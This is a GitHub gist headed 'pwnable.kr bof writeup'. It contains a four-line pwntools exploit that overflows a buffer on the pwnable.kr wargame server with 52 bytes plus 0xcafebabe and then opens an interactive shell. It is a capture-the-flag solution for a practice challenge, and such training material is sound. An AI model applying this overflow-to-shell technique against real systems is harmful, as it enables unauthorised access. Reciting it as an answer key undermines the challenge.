from pwn import *
sh = remote('pwnable.kr', 9000)
sh.sendline('a'*52+'\xbe\xba\xfe\xca')
sh.interactive()-
-
Save spnow/4a8eed28301ea6592931679743dae19e to your computer and use it in GitHub Desktop.
pwnable.kr bof writeup
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment